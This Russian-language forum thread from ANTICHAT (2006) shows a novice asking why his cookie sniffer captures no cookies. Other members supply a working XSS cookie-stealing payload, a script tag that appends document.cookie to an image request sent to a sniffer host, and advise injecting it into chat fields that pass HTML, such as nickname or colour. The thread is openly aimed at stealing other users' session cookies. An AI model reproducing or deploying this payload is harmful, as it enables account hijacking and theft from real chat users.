HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Чаты
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Народ помогите
  #1  
Старый 26.03.2006, 15:42
x[M]akep
Новичок
Регистрация: 26.03.2006
Сообщений: 24
С нами: 10593690

Репутация: 5
Exclamation Народ помогите

Народ помогите! Со снифером! почему когда я оставляю ссылку на снивер и ктонить на ней кликнет то в логе вот такая ЖОПА:


[Sun Mar 26 15:35:10 2006] IP=89.54.80.70 SITE=
REFERER=
QUERY=MT=1
AGENT=

[Sun Mar 26 15:33:56 2006] IP=207.46.98.148 SITE=
REFERER=
QUERY=
AGENT=msnbot/1.0 (+http://search.msn.com/msnbot.htm)

Никаких куков ГДЕ ОНИ куда пропали!?!?!?!?
ИЛИ я чет нитак делаю помогите плиз!
 

  #2  
Старый 26.03.2006, 15:57
vorishka
Постоянный
Регистрация: 03.03.2005
Сообщений: 351
С нами: 11151686

Репутация: 112
По умолчанию

ты забыл document.cookie
 

  #3  
Старый 26.03.2006, 16:31
ZINGER
Banned
Регистрация: 23.02.2006
Сообщений: 112
С нами: 10637625

Репутация: 37
По умолчанию

может даже у чела оутпост стоит и перекрывает рефер
 

  #4  
Старый 26.03.2006, 18:44
x[M]akep
Новичок
Регистрация: 26.03.2006
Сообщений: 24
С нами: 10593690

Репутация: 5
По умолчанию

Цитата:
Сообщение от vorishka  
ты забыл document.cookie
Я просто новичек в этом деле Че это такое document.cookie???
 

  #5  
Старый 26.03.2006, 19:26
vectorg
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
С нами: 10925666

Репутация: 454
По умолчанию

<script>img = new Image(); img.src = "http://путь_к_снифферу/s.jpg?"+document.cookie;</script>
 

  #6  
Старый 26.03.2006, 20:53
x[M]akep
Новичок
Регистрация: 26.03.2006
Сообщений: 24
С нами: 10593690

Репутация: 5
По умолчанию

Цитата:
Сообщение от VectorG  
<script>img = new Image(); img.src = "http://путь_к_снифферу/s.jpg?"+document.cookie;</script>
Но насколько я знаю такой скрипт подходит не для всех ЧАТОВ! или я ОШИБАЮСЬ? Если он для всех то где его тогда нужно писать?
 

  #7  
Старый 26.03.2006, 21:49
Utochka
Постоянный
Регистрация: 21.12.2005
Сообщений: 620
С нами: 10729766

Репутация: 268


По умолчанию

Если в чате есть XSS, то почему нет! Писать его надо там где пропускает html теги. А вообще то УЧИ МАТ ЧАСТЬ!
 

  #8  
Старый 27.03.2006, 00:20
~Fenix~
Banned
Регистрация: 26.07.2005
Сообщений: 240
С нами: 10942946

Репутация: 75
По умолчанию

К примеру можешь писать в поле ник или цвет
 

  #9  
Старый 27.03.2006, 01:36
NeMiNeM
Постоянный
Регистрация: 22.08.2005
Сообщений: 540
С нами: 10904066

Репутация: 1221


По умолчанию

Оставить ссылку на сниффер не достаточно.. Нужно сначало найти уязвимость, хсс в данному случае, а тогда уже внедрять ссылку на сниффер с кражой куков. А то, что они просто кликнут на линк, кроме айпи, тебе больше ничего не даст.
 

  #10  
Старый 27.03.2006, 02:32
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
С нами: 10762826

Репутация: 1348


По умолчанию

2 Автар А как же у тебя логи снифер пишет, если ты не знаешь куда вставлять скрипт???
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.